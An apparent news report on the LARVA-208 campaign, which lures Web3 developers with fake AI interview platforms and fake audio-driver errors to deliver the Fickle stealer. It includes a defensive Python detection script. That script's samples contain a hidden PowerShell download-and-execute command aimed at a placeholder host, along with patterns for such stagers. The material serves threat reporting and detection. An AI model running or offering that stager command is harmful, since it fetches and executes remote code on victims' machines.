A recent investigation by cybersecurity firm PRODAFT has uncovered a targeted and cunning phishing campaign by the threat group LARVA-208, which is now homing in on Web3 developers by weaponizing job applications, social engineering, and fake AI platforms. This campaign is an evolution of their previous schemes aimed at English-speaking IT staff, and it is far more deceptive than before.
“LARVA-208 used multiple domains to contact IT employees, gather their VPN credentials, and subsequently harvest usernames and passwords from victims,” the report explains. Now, that same tactic is being applied to blockchain developers under a new guise.
At the center of this new campaign is “Norlax AI,” a fraudulent AI workspace platform designed to mimic the legitimate Teampilot.ai. The attackers distribute fake interview invitations to Web3 developers, often through X (formerly Twitter), Telegram, or remote job boards like Remote3. These invites link to Norlax.ai, where victims are asked to join a meeting under the pretense of a job interview or portfolio review.

“When victims click on meeting links within these deceptive AI Workspace projects… they encounter an error message falsely claiming their audio drivers are outdated or missing,” the report explains.
This tactic plays on trust—especially among candidates accustomed to virtual interviews on emerging platforms.
Once inside the Norlax AI platform, users receive a fake error prompt indicating their Realtek HD Audio Driver is missing. If the victim clicks the link, they are redirected to audiorealtek[.]com, where they unknowingly download malware.
This malware executes an embedded PowerShell command to retrieve and execute the Fickle stealer from LARVA-208’s C2 servers.
The Fickle stealer is a familiar tool in LARVA-208’s arsenal, capable of siphoning:
- System details (OS, hardware, language settings)
- Geolocation and IP address
- Installed programs and running processes
- Crypto wallet data and development environment credentials
Earlier iterations of the campaign used .LNK shortcut files that appeared benign but actually executed malicious PowerShell scripts.
“This shortcut appeared to call manage-bde.wsf… but used the ampersand (&) operator to append and execute a hidden PowerShell command,” the report states.
The command downloaded Fickle malware from URLs like bitacid[.]net/payload/callback.ps1. In recent operations, the attackers have also shifted toward file-sharing platforms like Filebin to host payloads, and toward notify.php scripts to exfiltrate victim metadata.
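The .LNK trick described above, a benign-looking manage-bde.wsf call with a hidden PowerShell stager appended after the cmd.exe "&" operator, leaves a recognisable shape in process-creation telemetry. The following detection logic is an added example for defenders and is not code from PRODAFT's report; the command lines it scans are constructed samples, and the download host is a placeholder, not an indicator from the campaign.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
# The first mimics the report's LNK trick: a decoy manage-bde.wsf call chained
# with "&" to a hidden PowerShell download cradle (placeholder host, not a real IoC).
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c cscript.exe manage-bde.wsf -status & powershell.exe -w hidden -nop -c '
    "\"iex (New-Object Net.WebClient).DownloadString('https://payload.example.invalid/callback.ps1')\"",
    'cscript.exe manage-bde.wsf -status',
    'powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1',
    'cmd.exe /c dir & powershell.exe -w hidden -enc SQBFAFgA',
]

# cmd.exe command chaining: "&" runs the next command unconditionally, "&&" only on success.
# A bare "&" inside a URL query string would also split here; acceptable for a first-pass triage rule.
CHAIN_OPERATOR = re.compile(r'\s*&&?\s*')
SCRIPT_HOST_DECOY = re.compile(r'\.(wsf|vbs|js|lnk)\b', re.I)
POWERSHELL = re.compile(r'\b(powershell|pwsh)\b', re.I)
HIDDEN_OR_ENCODED = re.compile(r'-(w|win|window|windowstyle)\s+hidden|-(e|ec|enc|encodedcommand)\s', re.I)
DOWNLOAD_CRADLE = re.compile(r'downloadstring|downloadfile|invoke-webrequest|\biwr\b|\.ps1\b', re.I)


def classify(cmdline):
    """Return the reasons a command line resembles the chained LNK stager; empty means nothing matched."""
    reasons = []
    segments = [s for s in CHAIN_OPERATOR.split(cmdline) if s]
    if len(segments) < 2:          # nothing was chained, so the "&" trick is not in play
        return reasons
    decoy, tail = segments[0], ' '.join(segments[1:])
    if SCRIPT_HOST_DECOY.search(decoy) and POWERSHELL.search(tail):
        reasons.append('script-host decoy chained to PowerShell via &')
    if HIDDEN_OR_ENCODED.search(tail):
        reasons.append('hidden window or encoded command')
    if DOWNLOAD_CRADLE.search(tail):
        reasons.append('remote download cradle')
    return reasons


def flag_suspicious(cmdlines):
    """Keep lines showing the decoy chain itself, or at least two other stager traits."""
    hits = []
    for line in cmdlines:
        reasons = classify(line)
        if any(r.startswith('script-host decoy') for r in reasons) or len(reasons) >= 2:
            hits.append((line, reasons))
    return hits


if __name__ == '__main__':
    for line, reasons in flag_suspicious(SAMPLE_COMMAND_LINES):
        print(f'SUSPICIOUS: {line}\n  -> {"; ".join(reasons)}')
```

Only the first sample is flagged: the benign manage-bde.wsf status call and the scheduled backup script produce no hits, and the lone hidden-window PowerShell without a decoy or download cradle is reported by classify() but does not meet the flag threshold.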
The backend of the campaign is powered by a custom-built infrastructure called SilentPrism, which stores the exfiltrated data and logs from infected machines.
“In most cases… the information collected from victim devices is uploaded directly to the C2 servers used by the actor, which they have named SilentPrism,” the report reveals.
This infrastructure has been linked to Luminous Mantis, another known cybercrime group with ties to bulletproof hosting providers.
LARVA-208 is using novel delivery mechanisms but relying on well-established malware and social engineering tactics. Their ability to blend fake AI services, remote interviews, and realistic meeting platforms makes this campaign particularly dangerous for Web3 developers, whose access to crypto wallets and sensitive repositories presents a goldmine for attackers.
“This latest operation suggests a shift toward alternative monetization strategies, including the exfiltration of valuable data and credentials for potential resale or exploitation in illicit markets,” PRODAFT warns.